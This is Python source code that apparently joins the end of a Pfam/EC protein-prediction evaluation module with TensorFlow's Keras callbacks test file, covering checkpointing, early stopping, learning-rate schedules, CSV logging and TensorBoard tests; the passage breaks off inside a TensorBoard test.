will try to fetch this tensor from `inferrer`.
Returns:
pd.DataFrame with columns sequence_name, sequence, and predicted_label,
where the values in column predicted_label are frozenset of labels
that had confidences above decision_threshold.
"""
if label_vocab is None:
label_vocab = inferrer.get_variable('label_vocab:0')
working_df = input_df.copy()
df_with_predictions = inference.predictions_for_df(working_df, inferrer)
preds_per_sequence = filter_predictions_to_above_threshold(
predictions=df_with_predictions['predictions'].values,
decision_threshold=decision_threshold,
label_vocab=label_vocab)
df_with_predictions.drop(columns=['predictions'], inplace=True)
df_with_predictions['predicted_label'] = preds_per_sequence
return df_with_predictions
def _family_and_clan_to_just_clan(
family_and_clan):
"""Converts family_and_clan to just a clan if there is one.
Args:
family_and_clan: a set of either just a family, or a family and its
associated clan.
Returns:
If family_and_clan is only a family, return family_and_clan. If
family_and_clan has a clan, only return the clan.
Raises:
ValueError if len(family_and_clan != 1 or 2.
Also raises if len(family-and_clan) == 2 and there's no clan in it.
"""
if len(family_and_clan) == 1:
return frozenset(family_and_clan)
if len(family_and_clan) == 2:
for f_or_c in family_and_clan:
if f_or_c.startswith('Pfam:CL'):
return frozenset([f_or_c])
raise ValueError('family_and_clan was length 2, but did not have a clan in '
'it. family_and_clan was {}'.format(family_and_clan))
raise ValueError('Expected either one or two values for family_and_clan. '
'Was {}'.format(family_and_clan))
def pfam_label_normalizer_to_lifted_clan(
label_normalizer):
"""Converts label_normalizer (that may contan EC etc.) to lifted clans."""
working_dict = copy.deepcopy(label_normalizer)
working_dict = {k: v for k, v in working_dict.items() if k.startswith('Pfam')}
return {k: _family_and_clan_to_just_clan(v) for k, v in working_dict.items()}
def convert_pfam_ground_truth_to_lifted_clans(
ground_truth,
label_normalizer):
"""Converts ground truth to only have labels that are lifted clans.
The label normalizer may be already a lifted clan normalizer or it may be
a non-lifted clan normalizer.
Args:
ground_truth: pd.DataFrame with columns sequence_name (str),
true_label(Set[str]).
label_normalizer: label normalizer. This will be converted to a lifted clan
normalizer for use internally.
Returns:
pd.DataFrame with columns sequence_name (str), true_label(FrozenSet[str]).
"""
lifted_label_normalizer = pfam_label_normalizer_to_lifted_clan(
label_normalizer)
working_df = ground_truth.copy()
working_df['true_label'] = working_df.true_label.apply(
lambda l: normalize_predictions(l, lifted_label_normalizer))
return working_df
def _ec_label_at_level(label, level):
"""Return EC label up to and including level, or nan if it's a hyphen."""
# nan is a useful value for pd.DataFrame that's used to indicate missing
# data.
label = label.replace('EC:', '')
split = label.split('.')
if split[level - 1] == '-':
return np.nan
return '.'.join(split[:level])
def ec_agreement_for_level(df,
level):
"""Returns agreement and disagreement between predictions and truth.
Computes agreement, disagreement, and no-calls between true labels and
predicted labels at level 1, 2, 3, or 4 in the EC hierarchy. If the ground
truth label has a dash at this level, this is not included in our analysis
of agreement/disagreement, as there's nothing to agree or disagree about.
See the test for a more exhaustive listing of cases.
Args:
df: pd.DataFrame with columns 'true_label' (str) and 'predicted_label'
(str). It's assumed that the input proteins are single-function enzymes,
and that true and predicted label are the most specific predictions
available (e.g. EC:1.2.3.4 instead of EC:1.2.3.-).
level: int between 1 and 4.
Returns:
tuple of ints: [agreement, disagreement, no call made].
Raises:
ValueError if level is not between 1 and 4 inclusive.
"""
if not (level >= 1 and level <= 4):
raise ValueError(
'Expected level to be between 1 and 4. Was {}'.format(level))
get_ec_at_level = lambda x: _ec_label_at_level(x, level)
true_labels = df.true_label.apply(get_ec_at_level)
predicted_labels = df.predicted_label.apply(get_ec_at_level)
has_ground_truth_label = true_labels.notna()
pred_made = has_ground_truth_label & (predicted_labels.notna())
agree = has_ground_truth_label & pred_made & (true_labels == predicted_labels)
disagree = has_ground_truth_label & pred_made & (
true_labels != predicted_labels)
agree_numerator = sum(agree)
disagree_numerator = sum(disagree)
no_pred_made_numerator = sum(~pred_made & has_ground_truth_label)
if (agree_numerator + disagree_numerator + no_pred_made_numerator !=
sum(has_ground_truth_label)):
# Internal correctness check, so raise an AssertionError, not a ValueError.
error_msg = (f'Expected the sum agree_numerator + disagree_numerator + '
f'no_pred_made_numerator == sum(has_ground_truth_label): were '
f'{agree_numerator}, {disagree_numerator}, '
f'{no_pred_made_numerator} {sum(has_ground_truth_label)}')
raise AssertionError(error_msg)
return agree_numerator, disagree_numerator, no_pred_made_numerator
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import os
import re
import shutil
import tempfile
import threading
import unittest
import numpy as np
from tensorflow.core.framework import summary_pb2
from tensorflow.python import keras
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import test_util
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import adam
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class Counter(keras.callbacks.Callback):
"""Counts the number of times each callback method was run.
Attributes:
method_counts: dict. Contains the counts of time each callback method was
run.
"""
def __init__(self):
self.method_counts = collections.defaultdict(int)
methods_to_count = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
'on_test_begin', 'on_test_end', 'on_train_batch_begin',
'on_train_batch_end', 'on_train_begin', 'on_train_end'
]
for method_name in methods_to_count:
setattr(self, method_name,
self.wrap_with_counts(method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
def _check_counts(self, counter, expected_counts):
"""Checks that the counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
self.assertEqual(
counter.method_counts[method_name],
expected_count,
msg='For method {}: expected {}, got: {}'.format(
method_name, expected_count, counter.method_counts[method_name]))
def _get_model(self):
layers = [
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
adam.AdamOptimizer(0.001),
'binary_crossentropy',
run_eagerly=testing_utils.should_run_eagerly())
return model
def test_callback_hooks_are_called_in_fit(self):
x, y = np.ones((10, 10)), np.ones((10, 1))
val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
model = self._get_model()
counter = Counter()
model.fit(
x,
y,
validation_data=(val_x, val_y),
batch_size=2,
epochs=5,
callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1
})
def test_callback_hooks_are_called_in_evaluate(self):
x, y = np.ones((10, 10)), np.ones((10, 1))
model = self._get_model()
counter = Counter()
model.evaluate(x, y, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1
})
def test_callback_hooks_are_called_in_predict(self):
x = np.ones((10, 10))
model = self._get_model()
counter = Counter()
model.predict(x, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = keras.callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1
})
class KerasCallbacksTest(test.TestCase):
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint.h5')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.5
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = testing_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 1
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
# The best configuration is in the epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
return
monitor = keras.callbacks.RemoteMonitor()
# This will raise a warning since the default address in unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
random_seed.set_random_seed(1234)
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1))
return model
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)),
0.01,
atol=1e-4)
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer(object):
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegexpMatches(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = ' '.join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in csv.reader(f):
# In windows, due to \r\n line ends we may end up reading empty lines
# after each line. Skip empty lines.
if x:
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
def test_TerminateOnNaN(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
self.assertEqual(len(loss), 1)
self.assertEqual(loss[0], np.inf)
@test_util.run_deprecated_v1
def test_TensorBoard(self):
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(x_train) // BATCH_SIZE
else:
max_batch_index = len(x_test) // BATCH_SIZE
i = 0
while 1:
if train:
yield (x_train[i * BATCH_SIZE:(i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE:(i + 1) * BATCH_SIZE])
else:
yield (x_test[i * BATCH_SIZE:(i + 1) * BATCH_SIZE],
y_test[i * BATCH_SIZE:(i + 1) * BATCH_SIZE])
i += 1
i %= max_batch_index
# case: Sequential
with self.cached_session():
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
# non_trainable_weights: moving_variance, moving_mean
model.add(keras.layers.BatchNormalization())
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
tsb = keras.callbacks.TensorBoard(
log_dir=temp_dir, histogram_freq=1, write_images=True,
write_grads=True, batch_size=5)
cbks = [tsb]
# fit with validation data
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=3,
verbose=0)
# fit with validation data and accuracy
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
# fit generator with validation data
model.fit_generator(
data_generator(True),
len(x_train),
epochs=2,
validation_data=(x_test, y_test),
callbacks=cbks,
verbose=0)
# fit generator without validation data
# histogram_freq must be zero
tsb.histogram_freq = 0
model.fit_generator(
data_generator(True),
len(x_train),
epochs=2,
callbacks=cbks,
verbose=0)
# fit generator with validation data and accuracy
tsb.histogram_freq = 1
model.fit_generator(
data_generator(True),
len(x_train),
epochs=2,
validation_data=(x_test, y_test),
callbacks=cbks,
verbose=0)
# fit generator without validation data and accuracy
tsb.histogram_freq = 0
model.fit_generator(
data_generator(True), len(x_train), epochs=2, callbacks=cbks)
assert os.path.exists(temp_dir)
@test_util.run_deprecated_v1
def test_TensorBoard_multi_input_output(self):
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
filepath = os.path.join(tmpdir, 'logs')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(x_train) // BATCH_SIZE
else:
max_batch_index = len(x_test) // BATCH_SIZE
i = 0
while 1:
if train:
# simulate multi-input/output models
yield ([x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2,
[y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2)
else:
yield ([x_test[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2,
[y_test[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2)
i += 1
i %= max_batch_index
inp1 = keras.Input((INPUT_DIM,))
inp2 = keras.Input((INPUT_DIM,))
inp = keras.layers.add([inp1, inp2])
hidden = keras.layers.Dense(2, activation='relu')(inp)
hidden = keras.layers.Dropout(0.1)(hidden)
output1 = keras.layers.Dense(NUM_CLASSES, activation='softmax')(hidden)
output2 = keras.layers.Dense(NUM_CLASSES, activation='softmax')(hidden)
model = keras.models.Model([inp1, inp2], [output1, output2])
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# we must generate new callbacks for each test, as they aren't stateless
def callbacks_factory(histogram_freq):
return [keras.callbacks.TensorBoard(log_dir=filepath,
histogram_freq=histogram_freq,
write_images=True, write_grads=True,
batch_size=5)]
# fit without validation data
model.fit([x_train] * 2, [y_train] * 2, batch_size=BATCH_SIZE,
callbacks=callbacks_factory(histogram_freq=0), epochs=3)
# fit with validation data and accuracy
model.fit([x_train] * 2, [y_train] * 2, batch_size=BATCH_SIZE,
validation_data=([x_test] * 2, [y_test] * 2),
callbacks=callbacks_factory(histogram_freq=1), epochs=2)
# fit generator without validation data
model.fit_generator(data_generator(True), len(x_train), epochs=2,
callbacks=callbacks_factory(histogram_freq=0))
# fit generator with validation data and accuracy
model.fit_generator(data_generator(True), len(x_train), epochs=2,
validation_data=([x_test] * 2, [y_test] * 2),
callbacks=callbacks_factory(histogram_freq=1))
assert os.path.isdir(filepath)
@test_util.run_deprecated_v1
def test_Tensorboard_histogram_summaries_in_test_function(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
self.steps_seen = []
def add_summary(self, summary, global_step):
summary_obj = summary_pb2.Summary()
# ensure a valid Summary proto is being sent
if isinstance(summary, bytes):
summary_obj.ParseFromString(summary)
else:
assert isinstance(summary, summary_pb2.Summary)
summary_obj = summary
# keep track of steps seen for the merged_summary op,
# which contains the histogram summaries
if len(summary_obj.value) > 1:
self.steps_seen.append(global_step)
def flush(self):
pass
def close(self):
pass
def _init_writer(obj):
obj.writer = FileWriterStub(obj.log_dir)
